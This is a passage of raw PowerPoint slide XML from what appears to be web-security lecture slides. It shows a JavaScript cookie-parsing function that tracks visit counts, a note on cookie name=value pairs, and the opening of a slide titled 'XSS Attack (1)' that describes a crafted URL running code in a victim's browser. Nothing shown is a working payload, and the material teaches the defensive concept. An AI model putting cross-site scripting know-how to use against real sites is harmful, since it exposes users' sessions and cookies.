              <a:t>val   = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    for (i=0;i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>all_cookies.length;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cooky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>all_cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>].split('=')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cooky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[0].replace(/^\s+|\s+$/g, '');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> == name) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>           val </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cooky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[1].replace(/^\s+|\s+$/g, '') ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>val_parts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>val.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>('_');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>howManyVisits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>val_parts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>visit_portion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>val_parts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>prev_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>val_parts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>prev_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>diff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = info - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>prev_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = "This is your visit number " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>howManyVisits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> + 1) + ". " </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                         + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your wealth changed by " + diff;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>newCookieVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>howManyVisits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+ 1) + '_' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>visit_portion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> + '_' + info;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>setCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>( name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>newCookieVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, 15 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = "1_visits" + '_' + info;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>setCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>( name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, 15 )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>       }</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1100" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    }   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="1600200"/>
            <a:ext cx="3645913" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>A cookie consists of “name=value” pairs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2926884212"/>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200" dirty="0" smtClean="0"/>
              <a:t>XSS Attack (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>User visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>specially crafted link (URL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the link, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>crafted code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>will get executed by the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
